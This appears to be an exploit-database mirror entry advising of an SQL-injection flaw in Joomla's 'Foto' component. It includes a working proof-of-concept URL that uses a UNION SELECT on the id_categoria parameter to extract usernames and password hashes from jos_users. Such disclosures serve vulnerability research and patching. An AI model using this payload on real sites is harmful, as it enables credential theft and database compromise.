exploit-db-mirror/platforms/php/webapps/35956.txt
Offensive Security c1539379ff Update: 2015-02-01
7 new exploits
2015-02-01 08:35:41 +00:00

7 lines
No EOL
532 B
Text
Executable file

source: http://www.securityfocus.com/bid/48685/info
The 'Foto' component for Joomla! is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_foto&task=categoria&id_categoria=-4+union+select+1,password,username,4,5,6,7+from+jos_users--